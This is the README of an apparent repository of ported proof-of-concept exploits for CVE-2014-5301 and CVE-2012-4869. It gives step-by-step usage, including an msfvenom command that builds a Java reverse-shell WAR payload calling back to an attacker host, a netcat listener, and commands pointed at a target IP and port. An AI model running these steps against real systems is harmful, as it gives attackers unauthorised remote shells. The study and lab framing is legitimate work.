This is a repository which contains custom/ported POC exploits. They have been made for study and learning purposes. Currently under development.
CVE: 2014-5301
OSVDB: 116733
URL: https://seclists.org/fulldisclosure/2015/Jan/5
Original metasploit module: https://www.exploit-db.com/exploits/35845
35845.py file.war host port
- First create reverse shell payload
msfvenom -p java/shell_reverse_tcp LHOST=<ip address> LPORT=4444 -f war > shell.war
-
Start netcat listener
-
Run the script
35845.py shell.war 192.168.1.1 8080
Note: The exploit may require multiple run to get it working. Don't give up!
CVE: 2012-4869
URL: https://seclists.org/fulldisclosure/2012/Mar/234
Original code: https://www.exploit-db.com/exploits/18650
Edit the file and change rhost, lhost, lport
-
Start netcat listener on the port you configured
-
Run the script
python 18650.py